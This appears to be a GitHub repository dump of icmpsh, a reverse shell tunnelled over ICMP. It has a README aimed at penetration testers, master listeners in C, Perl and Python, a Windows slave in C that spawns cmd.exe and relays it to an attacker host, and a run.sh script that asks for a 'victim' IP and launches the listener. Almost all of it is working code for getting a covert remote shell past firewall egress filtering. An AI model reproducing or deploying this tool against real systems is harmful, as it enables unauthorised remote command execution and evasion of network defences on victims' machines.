├── README.md ├── icmpsh-m.c ├── icmpsh-m.pl ├── icmpsh-s.c ├── icmpsh.exe ├── icmpsh_m.py ├── run.sh └── screenshots ├── response_packet_from_icmpsh_slave_containing_output_of_command_whoami.png ├── running_icmpsh_master_on_attacker_machine.png └── running_icmpsh_slave_on_target.png /README.md: -------------------------------------------------------------------------------- 1 | ## Background 2 | 3 | Sometimes, network administrators make the penetration tester's life harder. Some of them do use firewalls for what they are meant to, surprisingly! 4 | Allowing traffic only onto known machines, ports and services (ingress filtering) and setting strong egress access control lists is one of these cases. In such scenarios when you have owned a machine part of the internal network or the DMZ (e.g. in a Citrix breakout engagement or similar), it is not always trivial to get a reverse shell over TCP, not to consider a bind shell. 5 | 6 | However, what about UDP (commonly a DNS tunnel) or ICMP as the channel to get a reverse shell? ICMP is the focus on this tool. 7 | 8 | ## Description 9 | 10 | icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python. The main advantage over the other similar open source tools is that it does not require administrative privileges to run onto the target machine. 11 | 12 | The tool is clean, easy and portable. The **slave (client) runs on the target Windows machine**, it is written in C and works on Windows only whereas the **master (server) can run on any platform on the attacker machine** as it has been implemented in C and Perl by [Nico Leidecker](http://www.leidecker.info/) and I have ported it to Python too, hence this GitHub fork. 13 | 14 | ## Features 15 | 16 | * Open source software - primarily coded by Nico, forked by me. 17 | * Client/server architecture. 18 | * The master is portable across any platform that can run either C, Perl or Python code. 19 | * The target system has to be Windows because the slave runs on that platform only for now. 20 | * The user running the slave on the target system does not require administrative privileges. 21 | 22 | ## Usage 23 | 24 | ### Running the master 25 | 26 | The master is straight forward to use. There are no extra libraries required for the C and Python versions. The Perl master however has the following dependencies: 27 | 28 | * IO::Socket 29 | * NetPacket::IP 30 | * NetPacket::ICMP 31 | 32 | When running the master, don't forget to disable ICMP replies by the OS. For example: 33 | ``` 34 | sysctl -w net.ipv4.icmp_echo_ignore_all=1 35 | ``` 36 | 37 | If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive commands send from the master. 38 | 39 | ### Running the slave 40 | 41 | The slave comes with a few command line options as outlined below: 42 | 43 | ``` 44 | -t host host ip address to send ping requests to. This option is mandatory! 45 | 46 | -r send a single test icmp request containing the string "Test1234" and then quit. 47 | This is for testing the connection. 48 | 49 | -d milliseconds delay between requests in milliseconds 50 | 51 | -o milliseconds timeout of responses in milliseconds. If a response has not received in time, 52 | the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. 53 | The counter is set back to 0 if a response was received. 54 | 55 | -b num limit of blanks (unanswered icmp requests before quitting 56 | 57 | -s bytes maximal data buffer size in bytes 58 | ``` 59 | 60 | In order to improve the speed, lower the delay (*-d*) between requests or increase the size (-s) of the data buffer. 61 | 62 | ## License 63 | 64 | This source code is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. 65 | 66 | This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. 67 | 68 | You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 69 | -------------------------------------------------------------------------------- /icmpsh-m.c: -------------------------------------------------------------------------------- 1 | /* 2 | * icmpsh - simple icmp command shell 3 | * Copyright (c) 2010, Nico Leidecker 4 | * This program is free software: you can redistribute it and/or modify 5 | * it under the terms of the GNU General Public License as published by 6 | * the Free Software Foundation, either version 3 of the License, or 7 | * (at your option) any later version. 8 | * 9 | * This program is distributed in the hope that it will be useful, 10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | * GNU General Public License for more details. 13 | * 14 | * You should have received a copy of the GNU General Public License 15 | * along with this program. If not, see . 16 | */ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | 30 | #define IN_BUF_SIZE 1024 31 | #define OUT_BUF_SIZE 64 32 | 33 | // calculate checksum 34 | unsigned short checksum(unsigned short *ptr, int nbytes) 35 | { 36 | unsigned long sum; 37 | unsigned short oddbyte, rs; 38 | 39 | sum = 0; 40 | while(nbytes > 1) { 41 | sum += *ptr++; 42 | nbytes -= 2; 43 | } 44 | 45 | if(nbytes == 1) { 46 | oddbyte = 0; 47 | *((unsigned char *) &oddbyte) = *(u_char *)ptr; 48 | sum += oddbyte; 49 | } 50 | 51 | sum = (sum >> 16) + (sum & 0xffff); 52 | sum += (sum >> 16); 53 | rs = ~sum; 54 | return rs; 55 | } 56 | 57 | int main(int argc, char **argv) 58 | { 59 | int sockfd; 60 | int flags; 61 | char in_buf[IN_BUF_SIZE]; 62 | char out_buf[OUT_BUF_SIZE]; 63 | unsigned int out_size; 64 | int nbytes; 65 | struct iphdr *ip; 66 | struct icmphdr *icmp; 67 | char *data; 68 | struct sockaddr_in addr; 69 | 70 | 71 | printf("icmpsh - master\n"); 72 | 73 | // create raw ICMP socket 74 | sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP); 75 | if (sockfd == -1) { 76 | perror("socket"); 77 | return -1; 78 | } 79 | 80 | // set stdin to non-blocking 81 | flags = fcntl(0, F_GETFL, 0); 82 | flags |= O_NONBLOCK; 83 | fcntl(0, F_SETFL, flags); 84 | 85 | printf("running...\n"); 86 | while(1) { 87 | 88 | // read data from socket 89 | memset(in_buf, 0x00, IN_BUF_SIZE); 90 | nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1); 91 | if (nbytes > 0) { 92 | // get ip and icmp header and data part 93 | ip = (struct iphdr *) in_buf; 94 | if (nbytes > sizeof(struct iphdr)) { 95 | nbytes -= sizeof(struct iphdr); 96 | icmp = (struct icmphdr *) (ip + 1); 97 | if (nbytes > sizeof(struct icmphdr)) { 98 | nbytes -= sizeof(struct icmphdr); 99 | data = (char *) (icmp + 1); 100 | data[nbytes] = '\0'; 101 | printf("%s", data); 102 | fflush(stdout); 103 | } 104 | 105 | // reuse headers 106 | icmp->type = 0; 107 | addr.sin_family = AF_INET; 108 | addr.sin_addr.s_addr = ip->saddr; 109 | 110 | // read data from stdin 111 | nbytes = read(0, out_buf, OUT_BUF_SIZE); 112 | if (nbytes > -1) { 113 | memcpy((char *) (icmp + 1), out_buf, nbytes); 114 | out_size = nbytes; 115 | } else { 116 | out_size = 0; 117 | } 118 | 119 | icmp->checksum = 0x00; 120 | icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size); 121 | 122 | // send reply 123 | nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr)); 124 | if (nbytes == -1) { 125 | perror("sendto"); 126 | return -1; 127 | } 128 | } 129 | } 130 | } 131 | 132 | return 0; 133 | } 134 | 135 | -------------------------------------------------------------------------------- /icmpsh-m.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env perl 2 | # 3 | # icmpsh - simple icmp command shell 4 | # Copyright (c) 2010, Nico Leidecker 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | # 18 | 19 | 20 | 21 | use strict; 22 | use IO::Socket; 23 | use NetPacket::IP; 24 | use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO); 25 | use Net::RawIP; 26 | use Fcntl; 27 | 28 | print "icmpsh - master\n"; 29 | 30 | # create raw socket 31 | my $sock = IO::Socket::INET->new( 32 | Proto => "ICMP", 33 | Type => SOCK_RAW, 34 | Blocking => 1) or die "$!"; 35 | 36 | # set stdin to non-blocking 37 | fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!"; 38 | 39 | print "running...\n"; 40 | 41 | my $input = ''; 42 | while(1) { 43 | if ($sock->recv(my $buffer, 4096, 0)) { 44 | my $ip = NetPacket::IP->decode($buffer); 45 | my $icmp = NetPacket::ICMP->decode($ip->{data}); 46 | if ($icmp->{type} == ICMP_ECHO) { 47 | # get identifier and sequencenumber 48 | my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data}); 49 | 50 | # write data to stdout and read from stdin 51 | print $data; 52 | $input = ; 53 | 54 | # compile and send response 55 | $icmp->{type} = ICMP_ECHOREPLY; 56 | $icmp->{data} = pack("SSa*", $ident, $seq, $input); 57 | my $raw = $icmp->encode(); 58 | my $addr = sockaddr_in(0, inet_aton($ip->{src_ip})); 59 | $sock->send($raw, 0, $addr) or die "$!\n"; 60 | } 61 | } 62 | } 63 | -------------------------------------------------------------------------------- /icmpsh-s.c: -------------------------------------------------------------------------------- 1 | /* 2 | * icmpsh - simple icmp command shell 3 | * Copyright (c) 2010, Nico Leidecker 4 | * This program is free software: you can redistribute it and/or modify 5 | * it under the terms of the GNU General Public License as published by 6 | * the Free Software Foundation, either version 3 of the License, or 7 | * (at your option) any later version. 8 | * 9 | * This program is distributed in the hope that it will be useful, 10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | * GNU General Public License for more details. 13 | * 14 | * You should have received a copy of the GNU General Public License 15 | * along with this program. If not, see . 16 | */ 17 | 18 | 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | #define ICMP_HEADERS_SIZE (sizeof(ICMP_ECHO_REPLY) + 8) 27 | 28 | #define STATUS_OK 0 29 | #define STATUS_SINGLE 1 30 | #define STATUS_PROCESS_NOT_CREATED 2 31 | 32 | #define TRANSFER_SUCCESS 1 33 | #define TRANSFER_FAILURE 0 34 | 35 | #define DEFAULT_TIMEOUT 3000 36 | #define DEFAULT_DELAY 200 37 | #define DEFAULT_MAX_BLANKS 10 38 | #define DEFAULT_MAX_DATA_SIZE 64 39 | 40 | FARPROC icmp_create, icmp_send, to_ip; 41 | 42 | int verbose = 0; 43 | 44 | int spawn_shell(PROCESS_INFORMATION *pi, HANDLE *out_read, HANDLE *in_write) 45 | { 46 | SECURITY_ATTRIBUTES sattr; 47 | STARTUPINFOA si; 48 | HANDLE in_read, out_write; 49 | 50 | memset(&si, 0x00, sizeof(SECURITY_ATTRIBUTES)); 51 | memset(pi, 0x00, sizeof(PROCESS_INFORMATION)); 52 | 53 | // create communication pipes 54 | memset(&sattr, 0x00, sizeof(SECURITY_ATTRIBUTES)); 55 | sattr.nLength = sizeof(SECURITY_ATTRIBUTES); 56 | sattr.bInheritHandle = TRUE; 57 | sattr.lpSecurityDescriptor = NULL; 58 | 59 | if (!CreatePipe(out_read, &out_write, &sattr, 0)) { 60 | return STATUS_PROCESS_NOT_CREATED; 61 | } 62 | if (!SetHandleInformation(*out_read, HANDLE_FLAG_INHERIT, 0)) { 63 | return STATUS_PROCESS_NOT_CREATED; 64 | } 65 | 66 | if (!CreatePipe(&in_read, in_write, &sattr, 0)) { 67 | return STATUS_PROCESS_NOT_CREATED; 68 | } 69 | if (!SetHandleInformation(*in_write, HANDLE_FLAG_INHERIT, 0)) { 70 | return STATUS_PROCESS_NOT_CREATED; 71 | } 72 | 73 | // spawn process 74 | memset(&si, 0x00, sizeof(STARTUPINFO)); 75 | si.cb = sizeof(STARTUPINFO); 76 | si.hStdError = out_write; 77 | si.hStdOutput = out_write; 78 | si.hStdInput = in_read; 79 | si.dwFlags |= STARTF_USESTDHANDLES; 80 | 81 | if (!CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) &si, pi)) { 82 | return STATUS_PROCESS_NOT_CREATED; 83 | } 84 | 85 | CloseHandle(out_write); 86 | CloseHandle(in_read); 87 | 88 | return STATUS_OK; 89 | } 90 | 91 | void usage(char *path) 92 | { 93 | printf("%s [options] -t target\n", path); 94 | printf("options:\n"); 95 | printf(" -t host host ip address to send ping requests to\n"); 96 | printf(" -r send a single test icmp request and then quit\n"); 97 | printf(" -d milliseconds delay between requests in milliseconds (default is %u)\n", DEFAULT_DELAY); 98 | printf(" -o milliseconds timeout in milliseconds\n"); 99 | printf(" -h this screen\n"); 100 | printf(" -b num maximal number of blanks (unanswered icmp requests)\n"); 101 | printf(" before quitting\n"); 102 | printf(" -s bytes maximal data buffer size in bytes (default is 64 bytes)\n\n", DEFAULT_MAX_DATA_SIZE); 103 | printf("In order to improve the speed, lower the delay (-d) between requests or\n"); 104 | printf("increase the size (-s) of the data buffer\n"); 105 | } 106 | 107 | void create_icmp_channel(HANDLE *icmp_chan) 108 | { 109 | // create icmp file 110 | *icmp_chan = (HANDLE) icmp_create(); 111 | } 112 | 113 | int transfer_icmp(HANDLE icmp_chan, unsigned int target, char *out_buf, unsigned int out_buf_size, char *in_buf, unsigned int *in_buf_size, unsigned int max_in_data_size, unsigned int timeout) 114 | { 115 | int rs; 116 | char *temp_in_buf; 117 | int nbytes; 118 | 119 | PICMP_ECHO_REPLY echo_reply; 120 | 121 | temp_in_buf = (char *) malloc(max_in_data_size + ICMP_HEADERS_SIZE); 122 | if (!temp_in_buf) { 123 | return TRANSFER_FAILURE; 124 | } 125 | 126 | // send data to remote host 127 | rs = icmp_send( 128 | icmp_chan, 129 | target, 130 | out_buf, 131 | out_buf_size, 132 | NULL, 133 | temp_in_buf, 134 | max_in_data_size + ICMP_HEADERS_SIZE, 135 | timeout); 136 | 137 | // check received data 138 | if (rs > 0) { 139 | echo_reply = (PICMP_ECHO_REPLY) temp_in_buf; 140 | if (echo_reply->DataSize > max_in_data_size) { 141 | nbytes = max_in_data_size; 142 | } else { 143 | nbytes = echo_reply->DataSize; 144 | } 145 | memcpy(in_buf, echo_reply->Data, nbytes); 146 | *in_buf_size = nbytes; 147 | 148 | free(temp_in_buf); 149 | return TRANSFER_SUCCESS; 150 | } 151 | 152 | free(temp_in_buf); 153 | 154 | return TRANSFER_FAILURE; 155 | } 156 | 157 | int load_deps() 158 | { 159 | HMODULE lib; 160 | 161 | lib = LoadLibraryA("ws2_32.dll"); 162 | if (lib != NULL) { 163 | to_ip = GetProcAddress(lib, "inet_addr"); 164 | if (!to_ip) { 165 | return 0; 166 | } 167 | } 168 | 169 | lib = LoadLibraryA("iphlpapi.dll"); 170 | if (lib != NULL) { 171 | icmp_create = GetProcAddress(lib, "IcmpCreateFile"); 172 | icmp_send = GetProcAddress(lib, "IcmpSendEcho"); 173 | if (icmp_create && icmp_send) { 174 | return 1; 175 | } 176 | } 177 | 178 | lib = LoadLibraryA("ICMP.DLL"); 179 | if (lib != NULL) { 180 | icmp_create = GetProcAddress(lib, "IcmpCreateFile"); 181 | icmp_send = GetProcAddress(lib, "IcmpSendEcho"); 182 | if (icmp_create && icmp_send) { 183 | return 1; 184 | } 185 | } 186 | 187 | printf("failed to load functions (%u)", GetLastError()); 188 | 189 | return 0; 190 | } 191 | int main(int argc, char **argv) 192 | { 193 | int opt; 194 | char *target; 195 | unsigned int delay, timeout; 196 | unsigned int ip_addr; 197 | HANDLE pipe_read, pipe_write; 198 | HANDLE icmp_chan; 199 | unsigned char *in_buf, *out_buf; 200 | unsigned int in_buf_size, out_buf_size; 201 | DWORD rs; 202 | int blanks, max_blanks; 203 | PROCESS_INFORMATION pi; 204 | int status; 205 | unsigned int max_data_size; 206 | struct hostent *he; 207 | 208 | 209 | // set defaults 210 | target = 0; 211 | timeout = DEFAULT_TIMEOUT; 212 | delay = DEFAULT_DELAY; 213 | max_blanks = DEFAULT_MAX_BLANKS; 214 | max_data_size = DEFAULT_MAX_DATA_SIZE; 215 | 216 | status = STATUS_OK; 217 | if (!load_deps()) { 218 | printf("failed to load ICMP library\n"); 219 | return -1; 220 | } 221 | 222 | // parse command line options 223 | for (opt = 1; opt < argc; opt++) { 224 | if (argv[opt][0] == '-') { 225 | switch(argv[opt][1]) { 226 | case 'h': 227 | usage(*argv); 228 | return 0; 229 | case 't': 230 | if (opt + 1 < argc) { 231 | target = argv[opt + 1]; 232 | } 233 | break; 234 | case 'd': 235 | if (opt + 1 < argc) { 236 | delay = atol(argv[opt + 1]); 237 | } 238 | break; 239 | case 'o': 240 | if (opt + 1 < argc) { 241 | timeout = atol(argv[opt + 1]); 242 | } 243 | break; 244 | case 'r': 245 | status = STATUS_SINGLE; 246 | break; 247 | case 'b': 248 | if (opt + 1 < argc) { 249 | max_blanks = atol(argv[opt + 1]); 250 | } 251 | break; 252 | case 's': 253 | if (opt + 1 < argc) { 254 | max_data_size = atol(argv[opt + 1]); 255 | } 256 | break; 257 | default: 258 | printf("unrecognized option -%c\n", argv[1][0]); 259 | usage(*argv); 260 | return -1; 261 | } 262 | } 263 | } 264 | 265 | if (!target) { 266 | printf("you need to specify a host with -t. Try -h for more options\n"); 267 | return -1; 268 | } 269 | ip_addr = to_ip(target); 270 | 271 | // don't spawn a shell if we're only sending a single test request 272 | if (status != STATUS_SINGLE) { 273 | status = spawn_shell(&pi, &pipe_read, &pipe_write); 274 | } 275 | 276 | // create icmp channel 277 | create_icmp_channel(&icmp_chan); 278 | if (icmp_chan == INVALID_HANDLE_VALUE) { 279 | printf("unable to create ICMP file: %u\n", GetLastError()); 280 | return -1; 281 | } 282 | 283 | // allocate transfer buffers 284 | in_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); 285 | out_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); 286 | if (!in_buf || !out_buf) { 287 | printf("failed to allocate memory for transfer buffers\n"); 288 | return -1; 289 | } 290 | memset(in_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); 291 | memset(out_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); 292 | 293 | // sending/receiving loop 294 | blanks = 0; 295 | do { 296 | 297 | switch(status) { 298 | case STATUS_SINGLE: 299 | // reply with a static string 300 | out_buf_size = sprintf(out_buf, "Test1234\n"); 301 | break; 302 | case STATUS_PROCESS_NOT_CREATED: 303 | // reply with error message 304 | out_buf_size = sprintf(out_buf, "Process was not created\n"); 305 | break; 306 | default: 307 | // read data from process via pipe 308 | out_buf_size = 0; 309 | if (PeekNamedPipe(pipe_read, NULL, 0, NULL, &out_buf_size, NULL)) { 310 | if (out_buf_size > 0) { 311 | out_buf_size = 0; 312 | rs = ReadFile(pipe_read, out_buf, max_data_size, &out_buf_size, NULL); 313 | if (!rs && GetLastError() != ERROR_IO_PENDING) { 314 | out_buf_size = sprintf(out_buf, "Error: ReadFile failed with %i\n", GetLastError()); 315 | } 316 | } 317 | } else { 318 | out_buf_size = sprintf(out_buf, "Error: PeekNamedPipe failed with %i\n", GetLastError()); 319 | } 320 | break; 321 | } 322 | 323 | // send request/receive response 324 | if (transfer_icmp(icmp_chan, ip_addr, out_buf, out_buf_size, in_buf, &in_buf_size, max_data_size, timeout) == TRANSFER_SUCCESS) { 325 | if (status == STATUS_OK) { 326 | // write data from response back into pipe 327 | WriteFile(pipe_write, in_buf, in_buf_size, &rs, 0); 328 | } 329 | blanks = 0; 330 | } else { 331 | // no reply received or error occured 332 | blanks++; 333 | } 334 | 335 | // wait between requests 336 | Sleep(delay); 337 | 338 | } while (status == STATUS_OK && blanks < max_blanks); 339 | 340 | if (status == STATUS_OK) { 341 | TerminateProcess(pi.hProcess, 0); 342 | } 343 | 344 | return 0; 345 | } 346 | 347 | -------------------------------------------------------------------------------- /icmpsh.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/commonexploits/icmpsh/24e0a6d463633ed305df7b10462a716aee7d9aca/icmpsh.exe -------------------------------------------------------------------------------- /icmpsh_m.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # icmpsh - simple icmp command shell (port of icmpsh-m.pl written in 4 | # Perl by Nico Leidecker ) 5 | # 6 | # Copyright (c) 2010, Bernardo Damele A. G. 7 | # 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | 22 | import os 23 | import select 24 | import socket 25 | import subprocess 26 | import sys 27 | 28 | def setNonBlocking(fd): 29 | """ 30 | Make a file descriptor non-blocking 31 | """ 32 | 33 | import fcntl 34 | 35 | flags = fcntl.fcntl(fd, fcntl.F_GETFL) 36 | flags = flags | os.O_NONBLOCK 37 | fcntl.fcntl(fd, fcntl.F_SETFL, flags) 38 | 39 | def main(src, dst): 40 | if subprocess.mswindows: 41 | sys.stderr.write('icmpsh master can only run on Posix systems\n') 42 | sys.exit(255) 43 | 44 | try: 45 | from impacket import ImpactDecoder 46 | from impacket import ImpactPacket 47 | except ImportError: 48 | sys.stderr.write('You need to install Python Impacket library first\n') 49 | sys.exit(255) 50 | 51 | # Make standard input a non-blocking file 52 | stdin_fd = sys.stdin.fileno() 53 | setNonBlocking(stdin_fd) 54 | 55 | # Open one socket for ICMP protocol 56 | # A special option is set on the socket so that IP headers are included 57 | # with the returned data 58 | try: 59 | sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) 60 | except socket.error, e: 61 | sys.stderr.write('You need to run icmpsh master with administrator privileges\n') 62 | sys.exit(1) 63 | 64 | sock.setblocking(0) 65 | sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) 66 | 67 | # Create a new IP packet and set its source and destination addresses 68 | ip = ImpactPacket.IP() 69 | ip.set_ip_src(src) 70 | ip.set_ip_dst(dst) 71 | 72 | # Create a new ICMP packet of type ECHO REPLY 73 | icmp = ImpactPacket.ICMP() 74 | icmp.set_icmp_type(icmp.ICMP_ECHOREPLY) 75 | 76 | # Instantiate an IP packets decoder 77 | decoder = ImpactDecoder.IPDecoder() 78 | 79 | while 1: 80 | cmd = '' 81 | 82 | # Wait for incoming replies 83 | if sock in select.select([ sock ], [], [])[0]: 84 | buff = sock.recv(4096) 85 | 86 | if 0 == len(buff): 87 | # Socket remotely closed 88 | sock.close() 89 | sys.exit(0) 90 | 91 | # Packet received; decode and display it 92 | ippacket = decoder.decode(buff) 93 | icmppacket = ippacket.child() 94 | 95 | # If the packet matches, report it to the user 96 | if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type(): 97 | # Get identifier and sequence number 98 | ident = icmppacket.get_icmp_id() 99 | seq_id = icmppacket.get_icmp_seq() 100 | data = icmppacket.get_data_as_string() 101 | 102 | if len(data) > 0: 103 | sys.stdout.write(data) 104 | 105 | # Parse command from standard input 106 | try: 107 | cmd = sys.stdin.readline() 108 | except: 109 | pass 110 | 111 | if cmd == 'exit\n': 112 | return 113 | 114 | # Set sequence number and identifier 115 | icmp.set_icmp_id(ident) 116 | icmp.set_icmp_seq(seq_id) 117 | 118 | # Include the command as data inside the ICMP packet 119 | icmp.contains(ImpactPacket.Data(cmd)) 120 | 121 | # Calculate its checksum 122 | icmp.set_icmp_cksum(0) 123 | icmp.auto_checksum = 1 124 | 125 | # Have the IP packet contain the ICMP packet (along with its payload) 126 | ip.contains(icmp) 127 | 128 | # Send it to the target host 129 | sock.sendto(ip.get_packet(), (dst, 0)) 130 | 131 | if __name__ == '__main__': 132 | if len(sys.argv) < 3: 133 | msg = 'missing mandatory options. Execute as root:\n' 134 | msg += './icmpsh-m.py \n' 135 | sys.stderr.write(msg) 136 | sys.exit(1) 137 | 138 | main(sys.argv[1], sys.argv[2]) 139 | -------------------------------------------------------------------------------- /run.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # icmp shell script 3 | # Daniel Compton 4 | # 05/2013 5 | echo "" 6 | echo "" 7 | echo -e "\e[00;32m##################################################################\e[00m" 8 | echo "" 9 | echo "ICMP Shell Automation Script for" 10 | echo "" 11 | echo "https://github.com/inquisb/icmpsh" 12 | echo "" 13 | echo -e "\e[00;32m##################################################################\e[00m" 14 | 15 | echo "" 16 | IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1) 17 | IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }') 18 | echo -e "\e[1;31m-------------------------------------------------------------------\e[00m" 19 | echo -e "\e[01;31m[?]\e[00m What is the victims public IP address?" 20 | echo -e "\e[1;31m-------------------------------------------------------------------\e[00m" 21 | read VICTIM 22 | echo "" 23 | echo "On the Victim Windows system run the following command once the below listener has started" 24 | echo "" 25 | echo -e "\e[01;32m[-]\e[00m Run the following code on your victim system:" 26 | echo "" 27 | echo -e "\e[01;32m++++++++++++++++++++++++++++++++++++++++++++++++++\e[00m" 28 | echo "" 29 | echo "icmpsh.exe -t '"$IP"' -d 500 -b 30 -s 128" 30 | echo "" 31 | echo -e "\e[01;32m++++++++++++++++++++++++++++++++++++++++++++++++++\e[00m" 32 | echo "" 33 | LOCALICMP=$(cat /proc/sys/net/ipv4/icmp_echo_ignore_all) 34 | if [ "$LOCALICMP" -eq 0 ] 35 | then 36 | echo "" 37 | echo -e "\e[01;32m[-]\e[00m Local ICMP Replies are currently enabled, I will disable these temporarily now" 38 | sysctl -w net.ipv4.icmp_echo_ignore_all=1 >/dev/null 39 | ICMPDIS="disabled" 40 | else 41 | echo "" 42 | fi 43 | echo "" 44 | echo "Launching Listener...,waiting for a inbound connection.." 45 | echo "" 46 | python icmpsh_m.py "$IP" "$VICTIM" 47 | if [ "$ICMPDIS" = "disabled" ] 48 | then 49 | echo "" 50 | echo -e "\e[01;32m[-]\e[00m Enabling Local ICMP Replies again now" 51 | sysctl -w net.ipv4.icmp_echo_ignore_all=0 >/dev/null 52 | echo "" 53 | else 54 | echo "" 55 | fi 56 | 57 | exit 0 58 | 59 | -------------------------------------------------------------------------------- /screenshots/response_packet_from_icmpsh_slave_containing_output_of_command_whoami.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/commonexploits/icmpsh/24e0a6d463633ed305df7b10462a716aee7d9aca/screenshots/response_packet_from_icmpsh_slave_containing_output_of_command_whoami.png -------------------------------------------------------------------------------- /screenshots/running_icmpsh_master_on_attacker_machine.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/commonexploits/icmpsh/24e0a6d463633ed305df7b10462a716aee7d9aca/screenshots/running_icmpsh_master_on_attacker_machine.png -------------------------------------------------------------------------------- /screenshots/running_icmpsh_slave_on_target.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/commonexploits/icmpsh/24e0a6d463633ed305df7b10462a716aee7d9aca/screenshots/running_icmpsh_slave_on_target.png --------------------------------------------------------------------------------